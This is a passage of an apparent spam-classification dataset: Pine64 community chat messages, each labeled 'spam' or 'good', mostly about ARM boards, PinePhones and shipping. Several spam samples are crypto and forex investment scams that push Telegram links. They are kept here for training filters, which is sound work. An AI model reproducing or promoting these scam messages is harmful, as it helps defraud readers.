\u1d47\u1d49\u1d9c\u1d43\u1d58\u02e2\u1d49 \u2071 \u1d48\u1d52\u207f\u1d57 \u1d4f\u207f\u1d52\u02b7 \u02b0\u1d52\u02b7 \u1d57\u1d52 \u1d57\u02b0\u1d43\u207f\u1d4f \u02b8\u1d52\u1d58 \u1d49\u207f\u1d52\u1d58\u1d4d\u02b0 \u1da0\u1d52\u02b3 \u1d47\u1d49\u2071\u207f\u1d4d \u02e2\u1d52 \u1d4f\u2071\u207f\u1d48 \u1d43\u207f\u1d48 \u1d4d\u1d52\u1d52\u1d48 \u1d57\u1d52 \u1d50\u1d49 \u2071\u207f \u02b8\u1d52\u1d58\u02b3 \u1d56\u02e1\u1d43\u1d57\u1da0\u1d52\u02b3\u1d50, \u2071\u1d57'\u02e2\n\ud83d\udc47\ud83d\udc47\ud83d\udc47\n@Expat_trader\n\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\udc47\nhttps://t.me/joinchat/Dm2C-u-n3TkwMmQ0\n", "category": "spam"}, {"text": "I am so fortunate that I am now making $ 1500 free weekly from the company as a representative. Best online trading company ever. capital-base\nThey give 120% and 140% profit after 24 hours Mining session and 5% referral commission\nBest paying platform \ud83d\udcaf\nhttps://is.gd/ur2tsS\n", "category": "spam"}, {"text": "English is the international language of business; i.e. productivity. Anyone who doesn\u2019t want to learn it is a culturalist and probably a racist. (re @Kirfkin: There's people from all over the world. English isn't everyone's first language.)\n", "category": "good"}, {"text": "Best to keep politics out\n", "category": "good"}, {"text": "\ud83d\udc4d (re @p64protocolbot: [D] <@Funeral> Best to keep politics out)\n", "category": "good"}, {"text": "We don't need political words. I don't like English because I favourite two other foreign languages. This is but no reason that I don't try to communicate in this language. This is important that we could collaborate over cultures (re @EricGLivingston: English is the international language of business; i.e. productivity. Anyone who doesn\u2019t want to learn it is a culturalist and probably a racist.)\n", "category": "good"}, {"text": "Eric, you deserve to become a meme \ud83d\ude02\n", "category": "good"}, {"text": "Eh, please be nice. And I highly recommend not to deepen the topic\n", "category": "good"}, {"text": "lodge a ticket with support\n", "category": "good"}, {"text": "Does `bash` have a way of populating a variable in a background thread with the script waiting for that to complete before using the variable?\n", "category": "good"}, {"text": "#offtopic\n", "category": "good"}, {"text": "Alright, ty\n", "category": "good"}, {"text": "np :)\n", "category": "good"}, {"text": "It's been closed. This room supersedes it.\nPeople were using the Pine64 room as a general space. So now it is.\nThere is sopine and lts room now for the actual Pine64 PINE64 boards\n", "category": "good"}, {"text": "Scrolls up like 50 messages lmao wtf baby\n", "category": "good"}, {"text": "dsimic: i really don't want to be making more niche purpose channels. this network's already getting unwieldy to manage\n", "category": "good"}, {"text": "would be cool to see a powerful arm64 workstation be developed\n", "category": "good"}, {"text": "Hello All\nCan any one help with pine64 smartwatch development related questions\nIs this the correct forum?\n", "category": "good"}, {"text": "ha so i still use ,y iphone5 at home for small things like amazon and GPS when i need it...... I AM LOCKED OUT OF AMAZON VIA I NEED UPDATE IOS13\nthey are on 12.5\n:moon2H:\nwhat the fuck kina bull this is that\n", "category": "good"}, {"text": "@dsimic, what makes MicroSD so important on a system that can take SSDs?\n", "category": "good"}, {"text": "impressive performance from bpfilter\nhttps://cdn.discordapp.com/attachments/463285150898192384/890817643479719956/image.png\n", "category": "good"}, {"text": "dsimic: you can have a minimum 1Gbps ethernet connection from usb c so I assume it will cone with time\ndsimic: you can have a minimum 1Gbps ethernet connection from usb c so I assume it will come with time\n~~also it'd probably be 10x cheaper to get adapters sadly~~\n", "category": "good"}, {"text": "dsimic: they support thunderbolt 4 iirc\n", "category": "good"}, {"text": "i thought bpfilter is abandoned?\n", "category": "good"}, {"text": "Buongiorno. Sono interessato all'acquisto del Pinenote, sono residente in Italia, ma sul sito www.pine64.org/pinenote/ non si puo' accedere alla procedura di acqisto. C'\u00e8 una alternativa? Grazie\n", "category": "good"}, {"text": "Hey we try to keep discussion here in English, it's easier to moderate that way and you're more likely to get a response\nAs for the question, the pinenote isn't available for purchase yet as far as I can tell, it'll be available soon as a development unit though\nWith m.2 E key you could absolutely solder wires to take the SDIO and UART connections for a wifi module elsewhere while still leaving the PCIe connection on the multiphy PCIe connection in place for an SSD in that slot\n", "category": "good"}, {"text": "what would you do with a PCIe 4x inside the laptop, dsimic? the only thing I can really think of is storage or the LiteFury or something\n(to be clear, I agree with you, I think having as much in the laptop is good, but I'm trying to figure out what you could actually add here)\n", "category": "good"}, {"text": "imagine the bottleneck factor of ann RTX 3090 connected to the rk3588 based pinebook pro pro\n", "category": "good"}, {"text": "And the beauty of it all is that if that big PCIe controller plays nice with GPUs and thunderbolt then there's literally no reason that idea couldn't work in theory\n", "category": "good"}, {"text": "(nobody ships GPUs on NVMe, do they? :P)\nM.2, bah, I keep mixing those up\n", "category": "good"}, {"text": "no, GPUs on M.2 are not a thing\n", "category": "good"}, {"text": "There are framebuffer/blitter units that output over vga but that's it\n", "category": "good"}, {"text": "not exactly super useful\n", "category": "good"}, {"text": "@Thanos the tank engine sometimes you just need to machine learn at a coffee shop and your RTX 3090\n", "category": "good"}, {"text": "So yeah if I ever disappear for a few months after we get an RK3588 pinebook you can probably assume I've gone into some kind of \"I will not go online until I finish this crazy project and make a blog post about it\" thing lol\ndsimic: my home setup it a ThinkPad with an external RX 570\n", "category": "good"}, {"text": "I will cheer you on Segfault o7\n", "category": "good"}, {"text": ">sets down Pinebook on table at coffee shop\n>pulls RTX 3090 eGPU out of bag and sets it on the floor, plugging it in to the nearest outlet\n>the lights dim for a second as the sheer power of your rig is too much for the building to handle\n>all the peasants are staring at you, jealous of your rig\n", "category": "good"}, {"text": "I took it to a LAN party once\n", "category": "good"}, {"text": "you have a decent laptop that becomes a workstation when you're at home, and you can bring your workstation with you if you really need to\n", "category": "good"}, {"text": ">you start training an AI on it, the heat output raising the temperature of the building noticeably\n>people start leaving, throwing dirty looks at you\n>they're still just jealous\n", "category": "good"}, {"text": "I was tempted by the Flow X13 which takes this concept to the extreme (small ultrabook-ish device with a 3080 eGPU), but it was ungodly expensive\n", "category": "good"}, {"text": "dsimic: then clearly you're not the target market for an egpu :P\n", "category": "good"}, {"text": "oh, I agree: but that's what I mean, you can't really extend the laptop internally in a way that will make it substantially more powerful\nWiFi can be engineered into the device in this hypothetical future\n", "category": "good"}, {"text": "the entire point of egpus and things like convergence on phones is just having one device\n", "category": "good"}, {"text": "My pinebook already has the best SSD I own lol\n", "category": "good"}, {"text": "RAID on a laptop is a possible outcome, but again, probably not the target market for a PBU\nyou're not making it weaker though, imo! :p\n", "category": "good"}, {"text": "I don't see much point in RAID unless you've already got like 4-6 drives lol\n", "category": "good"}, {"text": "true, but my opinion is the number of use cases enabled by external connectivity outweighs that of internal connectivity\n", "category": "good"}, {"text": "It's just not cost effective otherwise\ndsimic: in theory at least, connecting the SSD to a multiphy would only lose you 50mb/s at most, at least on slower drives like the 660p which I already think is plenty fast enough\nThe biggest hit would actually be wifi because you'd be stuck with SDIO modules rather than PCIe\nI'm not exhausting the cache lol\n", "category": "good"}, {"text": "so yeah there's a tradeoff\n", "category": "good"}, {"text": "Absolutely, but I also don't particularly care about wifi performance as long as it's faster than my internet connection so in this theoretical world I don't care about the small performance loss from a setup like that\nEven the PBPs current WiFi module is adequate for me\nSo yes in this theoretical world I don't actually lose any significant SSD or wifi performance\n", "category": "good"}, {"text": "splitting t5he 4 lanes from the pcie3.0 into 2 sets of 2 lanes could be fun for putting 2 SSDs in RAID\n", "category": "good"}, {"text": "If the controller supports it\n", "category": "good"}, {"text": "only four lanes is pretty limiting though :(\n", "category": "good"}, {"text": "Four lanes is quite a bit at 3.0 speeds\n32gbit/s\n", "category": "good"}, {"text": "two drives in a raid1 could be faster than one drive with the full bandwidth\n", "category": "good"}, {"text": "I'd be surprised if the interconnect rockchip designs will be able to handle that much tbh\n", "category": "good"}, {"text": "in a raid0 you'd get fdaster everything but no redundancy\nraid1 would have the redundancy benefits at least\n", "category": "good"}, {"text": "We can only hope rockchip sees this as an opportunity to create a future proof design (like with the 32gb ram limit) so they iron out the bottlenecks before they can become a problem in the next generation\n", "category": "good"}, {"text": "can a PCIE 3.0 lane be bifurcated into two PCIE 2.0 lanes?\n", "category": "good"}, {"text": "It wouldn't be 2.0 lanes\nIf it can it would be splitting it into two 3.0 2x lanes yeah\nOr possibly even something like one 3.0 1x and one 3.0 3x\niirc there's technically nothing stopping PCIe from working with odd numbers of lanes\nNon standard of course\nBut theoretically I think they can work\nI'm pretty sure there's also at least one 32x implementation\nBah that's semantics :P\n", "category": "good"}, {"text": "ah right, I thought 3.0 was double 2.0 but that's only true of 4.0 and above\n", "category": "good"}, {"text": "No 3.0 is double 2.0\nJust as 2.0 is double 1.0\n", "category": "good"}, {"text": "negatory, 2.0 is 5 GT/s, 3.0 is 8 GT/s\n", "category": "good"}, {"text": "Almost double :P\niirc the real world numbers for 2.0 are actually 4gt/s\n", "category": "good"}, {"text": "yeah, I was just wondering if it was possible to reconfigure a PCI-E 3.0 port with 4 lanes into a PCI-E 2.0 port with 8 lanes essentially\n", "category": "good"}, {"text": "And for 3.0 they're like 7.8gt/s or something\nYeah no\n", "category": "good"}, {"text": "yep, that's what I thought\nah well :-)\n", "category": "good"}, {"text": "Part of how 3.0 got extra speed was reducing error correction btw\nThose 5/8 numbers are theoretical numbers before encoding yeah\nI'm fairly certain it's before\nBecause PCIe 2.0 x1 is 500MB/s real world\nWhich is 4GT/s\nNot 5\nOh weird\n", "category": "good"}, {"text": "well, we're dreaming - take the Framework approach and turn the PCI-E interface into a modular component that you can switch out to a M.2 port or a Thunderbolt port as you wish :P\n", "category": "good"}, {"text": "Oh also talking about thunderbolt again, I've got more uses for it than just egpus so for someone like me a TB mod for the pbp could actually be insanely useful\nNote how I say mod, because for 99% of people it wouldn't make sense, I just happen to be the 1% of people crazy enough that something like that might just work :P\n", "category": "good"}, {"text": "@Segfault I'll take the bait, what do you use TB for?\n", "category": "good"}, {"text": "Well, GPUs, high speed networking and storage, and other small things that involve PCIe\n", "category": "good"}, {"text": "they mentioned other uses\n", "category": "good"}, {"text": "Oh the experiments I could run if I could plug a box into my PBP with a PCIe slot in it\nI've got the box :)\nhttps://cdn.discordapp.com/attachments/463285150898192384/890995058545917992/unknown.jpeg\n", "category": "good"}, {"text": "he's got a box\n", "category": "good"}, {"text": "Yeah but it's nowhere near as convenient having a whole separate machine to my laptop to connect things like that to\n", "category": "good"}, {"text": "what's the 3x PCIe 2.0 used for if you don't use the SATA port?\n", "category": "good"}, {"text": "On the RK3588?\n", "category": "good"}, {"text": "yup\n", "category": "good"}, {"text": "I think only two of the multiphys will have PCIe\nSo it's actually 2x PCIe 2.0 x1 I'm pretty sure\nTheoretically one would be used for an m.2 E key slot so you can use a pcie wifi module\nThe other one... beats me...\n\u00af\\\\_(\u30c4)\\_/\u00af\nThat 3x PCIe 2.0 comes from a cnx article which I'm pretty sure is riddled with errors\nI think they mistook 3 multiphys as 3 PCIe 2.0 controllers\nI'd imagine the rk3588 will probably have a multiphy layout similar to the RK3568\nAt least one of the controllers should be configured the same way it is on the quartz, so SATA/PCIe\nAnd I think one will be configured for USB 3.0/SATA\nBut I'm not sure on that\nAnd I don't know what the 3rd one is configured as\nAgain, check the RK3568 specs\nNono I think it's 2 separate pcie 2.0 x1 links assuming all multiphys that can be used for PCIe are\n", "category": "good"}, {"text": "https://eji4evk5kxx.exactdn.com/wp-content/uploads/2020/11/RK3588-Rockchip-Developer-Conference-2020.jpg\nI believe that says, exactly, \"three lanes PCI-e 2.0/SATA 3.0\"\nmake of that what you will\nalso while researching this, I saw this, and that seems like tough pricing to make\nhttps://cdn.discordapp.com/attachments/463285150898192384/890997380881711154/unknown.png\ntime will tell I suppose\n", "category": "good"}, {"text": "Maybe see if they had a similar slide for the RK3568? Since that's actually been released we could compare what they said to what we got\nIgnore the pcie 3.0 controller in that diagram btw, that's specific to the RK3568, sort of like the 3.0 x4 controller in the 3588\n", "category": "good"}, {"text": "yep I think that image is from the same conference (Rockchip DC 2020)\nit's September 2021, where did the time go? :-)\n", "category": "good"}, {"text": "That sounds hopeful for the 3588 3.0 controller doing the same then\nhttps://cdn.discordapp.com/attachments/463285150898192384/890998679845085244/unknown.jpeg\nThat's the 3568\nThose muxes are the multiphys\nI would imagine the 3588 will be laid out the same way\nAlthough maybe not because that only has a single pcie 2.0 controller\nMaybe mux0 on the rk3588 will also have another pcie2.0 controller or something\nAnd iirc compared to that image the 3566 deleted the qsgmii controller and mux0\nAs well as the PCIe 3.0 contriller\nPotentially?\nI think it can do at least three although idk how qsgmii works\nOh I see\nInteresting\nSo yeah I guess the RK3568 can run 6 Ethernet ports directly with the right hardware\nWhy not both :P\nWouldn't qsgmii give you better performance?\nBecause you've got a direct link to every port\nDoes increasing packet size markedly decrease CPU use?\nI wonder if the CPU would be powerful enough to route the theoretical what 12gbit/s of 9000mtu packets you could do with that many Ethernet ports lol\nThat is a **lot** of packets lol\nAlthough for applications where maximum performance isn't needed it might be a good idea anyway because it gives you better firewalling ability and such\nIt's crazy how Rockchip finds new ways to make their chips so versatile lol\nI mean the RK3568 could do so many things, it could be a high end router one minute and a NAS the next\nOr even a phone! :P\nI mean hell this generation they were like \"hmm this chip doesn't do enough stuff, let's just let it *modify itself on the fly*\" with muxes :P\n", "category": "good"}, {"text": "android: strange chats go into the offtopic channel\n", "category": "good"}, {"text": "PINEPHONE will ship to India in future?\n", "category": "good"}, {"text": "@Avamander could you add the general Pine64 chat and the lts-and-sopine channel to your Matrix space? And maybe one or two of the admins\nsaifage: not as of now. Pine tried it but there have been severe issues with the customs, from how I've understood it\n", "category": "good"}, {"text": "Provide the full channel address\n", "category": "good"}, {"text": "https://riot.im/app/#/room/#pine64:matrix.org (#pine64:matrix.org) and https://riot.im/app/#/room/#pine64sopine:matrix.org (#pine64sopine:matrix.org), see https://wiki.pine64.org/wiki/Main_Page#Chat_Platforms. Thankks, @Avamander\n", "category": "good"}, {"text": "Done\n", "category": "good"}, {"text": "\ud83d\udc4d\n", "category": "good"}, {"text": "Yeah, I have been told that indian customs made it practically impossible for Pine to send anything there\nSo your only option is a mail forwarding service right bow\n", "category": "good"}, {"text": "There used to be an #accessories channel -- and it's now no more..\n..and it's still weirdly listed in #information-and-rules : -)\n", "category": "good"}, {"text": "Is three a chat specifically for the Pinephone? Was wondering about anybody with AT&T usage.\n", "category": "good"}, {"text": "@pinephone\n", "category": "good"}, {"text": "Thanks (re @UniversalSuperBox: @pinephone)\n", "category": "good"}, {"text": "anytime :)\n", "category": "good"}, {"text": "hey im doing a small project and i need a single board computer to act as a network proxy - I've got few questions which dont really belong into any of the sbc chats (cuz tbf its about choosing the device), so i hope nobody minds asking here. My main question is which (if any) sb computer can act as a network proxy (wirless best, but in case id have to hook up 2 wifi dongles itll also do) for reverse engineering assu\nhey im doing a small project and i need a single board computer to act as a network proxy - I've got few questions which dont really belong into any of the sbc chats (cuz tbf its about choosing the device), so i hope nobody minds asking here. My main question is which (if any) sb computer can act as a network proxy (wirless best, but in case id have to hook up 2 wifi dongles itll also do) for reverse engineering assu\n", "category": "good"}, {"text": "What do we do when we buy a replacement cable and the barrel plug doesn't fit?\nnormal people: return it\nMe: create a new cable that has the potential to break the device and make it a smoke machine but that's chill too \ud83d\ude42\n", "category": "good"}, {"text": "Hi everyone. Anyone knows why the delivery in Europe(I had ordered pinephone) it\u2019s taking so long, waiting already more than 2 weeks, is that normal?!!\nThanks for reply, Not yet, didn\u2019t get any tracking number\n", "category": "good"}, {"text": "hey, i received a pinephone a couple of months ago and only yesterday i had the opportunity to try it. at first it ran ok, although i did see some error message on booting. now though the screen is turned off every second, sometimes when i touch it and sometimes just by itself. totally unusable. i'm running the default os (manjaro) and i did play with the screen settings, but this behaviors doesn't make any sense.\n", "category": "good"}, {"text": "~~but it supports discord calling~~\n", "category": "good"}, {"text": "The PinePhone could do Voip calling though, @Riff\n(Using software, but you will need a data sim or wifi connectiom obv)\n", "category": "good"}, {"text": "Hello Poeples!\n", "category": "good"}, {"text": "Helol :)\nHello :)\n", "category": "good"}, {"text": "can i ask for support about linux on amlogic devices here? they are basically a SBC now\n", "category": "good"}, {"text": "sorry server is meant for discussing Pine64 devices\n", "category": "good"}, {"text": "PINE64 doesn't have any devices with amlogic SoCs, so this is not correct place, although, you can try to ask in #offtopic and maybe someone will help you\n", "category": "good"}, {"text": "oaky, thanks for the help.\n", "category": "good"}, {"text": "Lmao I Couldn\u2019t find my sxmo arch phone for like 3 weeks I found it just now and it ran 100+ updates in like 2 mins\nPhosh does 100+ in like 10 mins\n", "category": "good"}, {"text": "could be 1 min with eufs and 1x1 AC wifi\n", "category": "good"}, {"text": "Lol trueee\nAll the speeds\n", "category": "good"}, {"text": "2 GB/s is adequate speed for embedded storage i think\n", "category": "good"}, {"text": "lol https://twitter.com/sephr/status/1441655526807334914\n", "category": "good"}, {"text": "Vivaldi browser is cool\n", "category": "good"}, {"text": "An Australian here very interested in ordering a PinePhone as soon as possible.\nMy knowledge level for potential carrier/connection/service suitability is novice.\nThanks for this group and any thoughts/comments/guidance is sincerely welcome.\nAppreciated!\n", "category": "good"}, {"text": "whats up with this \"Pine64 Protocol Droid\" bot? Are these just messages from Telegram/Discord? I was under the impression that matrix bridges would allow for non-matrix messages to still show up without the need for a bot like this...\n", "category": "good"}, {"text": "can anyone here help me? not sure what to do\n", "category": "good"}, {"text": "That depends entirely on what your issue is.\n", "category": "good"}, {"text": "i wrote yesterday. here it is: \"hey, i received a pinephone a couple of months ago and only yesterday i had the opportunity to try it. at first it ran ok, although i did see some error message on booting. now though the screen is turned off every second, sometimes when i touch it and sometimes just by itself. totally unusable. i'm running the default os (manjaro) and i did play with the screen settings, but this b\n", "category": "good"}, {"text": "It's made by the screen settings KCM writing bogus config files. Remove the ~/.config/powermanagementrc file if you can (maybe through JumpDrive on an SD card)\n", "category": "good"}, {"text": "thanks, i'll give it a try! :)\n", "category": "good"}, {"text": "I have earned more from trading Stock..all thanks you and your team for your trust and honestly. @Elliot_Finances\nhttps://t.me/joinchat/LcYrRXbptyNkZjVk\n", "category": "spam"}, {"text": "pinaperr: same over here, i got my PinePhone in the end of June 2021. The manjaro + plasma-mobile installed on it are not for everyday use. Plus the modem was dying often even after 2 hours, etc.\nHOWEVER then I installed postmarketOS phosh (the edge version) - and now I always smile, works really good\n", "category": "good"}, {"text": "@Philpax that and how Pine links then. IRC has a server linked, Discord has an invite link public and Matrix and Telegram both link individual channels, both also have a spam issue here\n", "category": "good"}, {"text": "dsimic, maybe you also could voice that in the forum thread? : -)\n", "category": "good"}, {"text": "Are there any plans to use matrix?\n", "category": "good"}, {"text": "can confirm, am typing this from matrix\n", "category": "good"}, {"text": "can confirm, also typing from matrix\n", "category": "good"}, {"text": "Ooooooo\n", "category": "good"}, {"text": "Hello Anyone have the link to download the latest Ubuntu touch version for pinephone thanks?\n", "category": "good"}, {"text": "I use #offtopic and #pinephone so often I forgot there was a general channel lol\n", "category": "good"}, {"text": "The general chat is new. Like a week old @CCF_100\n@Mk see https://wiki.pine64.org/wiki/PinePhone_Software_Releases#Ubuntu_Touch\n", "category": "good"}, {"text": "In matrix the topic for this channel reads: \"General discussion for the Pine64 Chat Network. Product-specific questions and discussion and better suited to other chats.\"\n", "category": "good"}, {"text": "Yeah, but new folks will ask specific product questions here anyway. That is something to life with, IMO.\nIts also laziness. Ask in the first channel you can find. Same like people asking things you have to look up yourself just to get the link, what the asking persons could have done themselves.\n", "category": "good"}, {"text": "I asked questions about \"free-software open-design alternative to FitBit, where the user has full control over their own data\"\nand was led to the PineTime. It does a lot more than I'd need from such a device but seems to have the right sensors and connectivity.\nHow well does it make the data avilable? Are there standard \"show me data from my wearable\" apps for GNU+Linux, and for LineageOS, which work with this?\n", "category": "good"}, {"text": "Hi Ben Finney, I recommend you to join PineTime Matrix channel, you can find link on our wiki page https://wiki.pine64.org/ :)\n", "category": "good"}, {"text": "I think there is a bug with pine64 website. You have one (old version) of website without www and newest with www.\n", "category": "good"}, {"text": "what? :o\n", "category": "good"}, {"text": "https://pine64.org should redirect to https://www.pine64.org. It does for me...\n", "category": "good"}, {"text": "I tried it too - works for me\nThere is also https://pine64.com/, which I am pretty sure is a different site intentionally\n", "category": "good"}, {"text": "@fervi test again with pressing control+F5 to reload your local cache\n", "category": "good"}, {"text": "@Funeral Maybe the bug is, cause I get a website to old version\nI mean\nhttps://pine64.com/product-category/single-board-computers/\nsorry - anyway, it should be removed or just merged\n", "category": "good"}, {"text": "That's the shop, which is a different site and a different organization behind it\n", "category": "good"}, {"text": "ok, but if you then click on \"Home button\", the redirect wont work\n", "category": "good"}, {"text": "The store has more issues than that \ud83d\ude1b\n", "category": "good"}, {"text": "ok \ud83d\ude1b\n", "category": "good"}, {"text": "Click on Cart > Orders while having an empty cart for example\n", "category": "good"}, {"text": "But is the shop open source?\n", "category": "good"}, {"text": "You mean the shop software? \ud83d\ude04\n", "category": "good"}, {"text": "yep\nMaybe I should add some bugs\n\ud83d\ude1b\n", "category": "good"}, {"text": "Looks like Wordpress but enhancing the site is not a focus \ud83d\ude1b\n", "category": "good"}, {"text": "hi I just got the Pinephone and im new to Linux can anyone help me what this is about? :\n", "category": "good"}, {"text": "Magnus: What distro do you use?\nok\n", "category": "good"}, {"text": "im on the defoult that came with the phone how can i check to make sure?\n", "category": "good"}, {"text": "I would suggest updating via terminal/pacman instead of discover.\nDiscover has issues with pacman 6 / packagekit for some reason.\n", "category": "good"}, {"text": "okay thx\n", "category": "good"}, {"text": "Anyway - is there any news about supporting Bitcoin in Pine64 payments?\n", "category": "good"}, {"text": "I have earned more from trading Stock..all thanks you and your team for your trust and honestly. @Elliot_Finances\nhttps://t.me/joinchat/LcYrRXbptyNkZjVk\n", "category": "spam"}, {"text": "@Moderator telegram's back at it again with the white vans\n", "category": "good"}, {"text": "Maybe fervi spawned the crypto spam @Porkyofthepine \ud83d\ude1b\n", "category": "good"}, {"text": "Lol maybe\n", "category": "good"}, {"text": "Probably \ud83d\ude04\nUnlimited power! \ud83d\ude04\n", "category": "good"}, {"text": "My ancient pineA64+ doing well thx to the uboot-pine64 boot file and the dkms wayland driver for the mali-utgard gpu \ud83d\udc4c\ud83c\udffc (re @errquilibria: )\nMy ancient pineA64+ doing well thx to the uboot-pine64 boot file and the dkms wayland driver for the mali-utgard gpu \ud83d\udc4c\ud83c\udffc thanks for the help and support on pine64 etc @strit it was a good guide (re @errquilibria: )\n", "category": "good"}, {"text": "uuuuh llvmpipe\n", "category": "good"}, {"text": "I would have thought Arch would be using Lima like the rest of us on mainline kernel.\n", "category": "good"}, {"text": "I found the wayland driver from sunxi50i-a64 support site is the smoothest and supporting graphic acceleration, not that it's a large device but I get about 28 fps in 720p resolution\nYeah it picked the llvm automatically (re @p64protocolbot: [D] uuuuh llvmpipe)\nHow does Lima differ from llvm\n", "category": "good"}, {"text": "Lima is a hardware driver, where llvm is a software driver I believe.\nSo llvm will use the CPU instead of the GPU.\n", "category": "good"}, {"text": "Oh OK, I'll look into that, wayland is a kernel driver though but I'll see if there is Lima support on this mali-400 etc hardware (re @p64protocolbot: [M] Lima is a hardware driver, where llvm is a software driver I believe.)\n", "category": "good"}, {"text": "You can check in your kernel with `zgrep LIMA /proc/config.gz`.\n", "category": "good"}, {"text": "Ah yes, I understand, interesting stuff (re @p64protocolbot: [M] So llvm will use the CPU instead of the GPU.)\nI'll have a look yes thx for the info, it's bit late by me, almost 10 pm so will see tomorrow (re @p64protocolbot: [M] You can check in your kernel with `zgrep LIMA /proc/config.gz`.)\nI'll look @ arch wiki solong tho\n", "category": "good"}, {"text": "Hi guys! I bought a few things on the site pine64.com, order # 199856 and they never sent me any product or track number. no explanation ... Is this not your site? Is this a fake that your company pretends to be?\nIs there someone from the store support here?\n", "category": "good"}, {"text": "No, you won't find store support here. But pine64.com is the pine64 store. You can email the support address listed on pine64.com for order help. But you won't receive anything but your order confirmation until the item ships, which depending on the item could be several weeks.\n", "category": "good"}, {"text": "FlyFrog, when you placed your order?\n", "category": "good"}, {"text": "A month passed, I wrote to the mail several times, they never answered, I began to worry, as I bought several products. (re @UniversalSuperBox: No, you won't find store support here. But pine64.com is the pine64 store. You can email the support address listed on pine64.com for order help. But you won't receive anything but your order confirmation until the item ships, which depending on the item could be several we\n[Order #199856] (August 29, 2021) (re @p64protocolbot: [D] FlyFrog, when you placed your order?)\n", "category": "good"}, {"text": "That's definitely weird @FlyFrog , please, try ask http://support.pine64.org\nIf you will not receive an answer within few days, please come back here again and ping me\n", "category": "good"}, {"text": "Thank you! (re @gamiee: That's definitely weird @FlyFrog , please, try ask http://support.pine64.org)\n", "category": "good"}, {"text": "Words alone won't express how thankful I'm to you @Fxprofitable1 , investing with you has been a good opportunity for me and family I just received my profit of $ 11,200 within a 48hours of active trading, thank you so very much\nReach him through this link\n\ud83d\udc47\ud83d\udc47\ud83d\udc47\nhttps://t.me/joinchat/RgoRdoQwRpM5MzJk\n", "category": "spam"}, {"text": "https://cdn.discordapp.com/attachments/463285150898192384/892589453628043304/unknown.png\nhttps://cdn.discordapp.com/attachments/463285150898192384/892589498569990244/unknown.png\n\ud83d\ude43\n", "category": "good"}, {"text": "Just of of curiosity how easy is it to make your pinebook/general arm64 device unbootable by using the wrong partition scheme\nI.e deleting u boot\nThe fact that the bootloader needs to be run from a specific device on arm always gave me anxiety\n", "category": "good"}, {"text": "Forwarded from unknown: \ud835\udc08\ud835\udc27 \ud835\udc2b\ud835\udc1e\ud835\udc1c\ud835\udc1e\ud835\udc27\ud835\udc2d \ud835\udc32\ud835\udc1e\ud835\udc1a\ud835\udc2b\ud835\udc2c \ud835\udc1b\ud835\udc22\ud835\udc2d\ud835\udc1c\ud835\udc28\ud835\udc22\ud835\udc27 \ud835\udc22\ud835\udc27\ud835\udc2f\ud835\udc1e\ud835\udc2c\ud835\udc2d\ud835\udc26\ud835\udc1e\ud835\udc27\ud835\udc2d \ud835\udc21\ud835\udc1a\ud835\udc2f\ud835\udc1e \ud835\udc1b\ud835\udc1e\ud835\udc1c\ud835\udc28\ud835\udc26\ud835\udc1e \ud835\udc28\ud835\udc27\ud835\udc1e \ud835\udc28\ud835\udc1f \ud835\udc2d\ud835\udc21\ud835\udc1e \ud835\udc26\ud835\udc28\ud835\udc2c\ud835\udc2d \ud835\udc2d\ud835\udc2b\ud835\udc2e\ud835\udc2c\ud835\udc2d\ud835\udc1e\ud835\udc1d \ud835\udc1a\ud835\udc27\ud835\udc1d \ud835\udc2b\ud835\udc1e\ud835\udc25\ud835\udc22\ud835\udc1a\ud835\udc1b\ud835\udc25\ud835\udc1e \ud835\udc2c\ud835\udc28\ud835\udc2e\ud835\udc2b\ud835\udc1c\ud835\udc1e\ud835\udc2c \ud835\udc28\ud835\udc1f \ud835\udc26\ud835\udc1a\ud835\udc24\ud835\udc22\ud835\udc27\ud835\udc20 \ud835\udc26\ud835\udc28\ud835\udc2b\ud835\udc1e \ud835\udc26\ud835\udc28\ud835\udc27\ud835\udc1e\ud835\udc32 \ufffd\n\ud835\udc12\ud835\udc28 \ud835\udc30\ud835\udc22\ud835\udc2d\ud835\udc21 \ud835\udc21\ud835\udc1a\ud835\udc29\ud835\udc29\ud835\udc32 \ud835\udc21\ud835\udc1e\ud835\udc1a\ud835\udc2b\ud835\udc2d, \ud835\udc08 \ud835\udc2c\ud835\udc1a\ud835\udc32 \ud835\udc2d\ud835\udc21\ud835\udc1a\ud835\udc27\ud835\udc24 \ud835\udc32\ud835\udc28\ud835\udc2e \ud835\udc2d\ud835\udc28 \ud835\udc2d\ud835\udc21\ud835\udc1e \ud835\udc26\ud835\udc1a\ud835\udc27\ud835\udc1a\ud835\udc20\ud835\udc1e\ud835\udc26\ud835\udc1e\ud835\udc27\ud835\udc2d \ud835\udc28\ud835\udc1f CRYPTO GOLDEN FX\n\ud835\udc18\ud835\udc28\ud835\udc2e'\ud835\udc2b\ud835\udc1e \ud835\udc03\ud835\udc1e\ud835\udc2f\ud835\udc22\ud835\udc27\ud835\udc1e\ud83d\udc99\n\ud835\udc07\ud835\udc1a\ud835\udc2f\ud835\udc1e \ud835\udc02\ud835\udc1c\ud835\udc28\ud835\udc27\ud835\udc2d\ud835\udc1a\ud835\udc1c\ud835\udc2d \ud835\udc30\ud835\udc22\ud835\udc2d\ud835\udc21 \ud835\udc2d\ud835\udc21\ud835\udc1e\ud835\udc26 \ud835\udc21\ud835\udc1e\ud835\udc2b\ud835\udc1e\n\ud83d\udc47\ud83d\udc47\ud83d\udc47\nhttps://t.me/joinchat/FVmheLMh1j9mYmQ0\n", "category": "spam"}, {"text": "With happy heart, your banned.\n", "category": "good"}, {"text": "c2a1: A64 devices will load the bootloader from an SD card first if one is available so those are effectively unbrickable\nRK3399 devices are a bit more tricky, they'll load from eMMC first, so a physical switch is included that disconnects the eMMC if needed\nAlthough before even that they'll load from SPI so if you want some reassurance you can also flash the SPI chip on devices that have it like the PBP\n", "category": "good"}, {"text": "Forwarded from unknown: I really appreciate al her efforts with the little investment of \u20ac2,000 with joy all over me after withdrawing by of \u20ac12,700 through the coach of https://t.me/joinchat/sz7bG_wdB3U5ZDc0\n", "category": "spam"}, {"text": "oh cmon\n", "category": "good"}, {"text": "Hello everybody! Can I buy pinephone with delivery to Russia?\n", "category": "good"}, {"text": "so how do i go about using discord on a pinephone\n", "category": "good"}, {"text": "WayDroid\nhttps://cdn.discordapp.com/attachments/463285150898192384/892896058533879858/WhyAmILikeThis_WIP_5.mp3\n", "category": "good"}, {"text": "thank you\n", "category": "good"}, {"text": "no problem\n", "category": "good"}, {"text": "> <@p64protocolbot:matrix.org> [D] WayDroid\nDoesnt discord have a web client\n", "category": "good"}, {"text": "yes but the useragent on the pinephone is setup to make it think 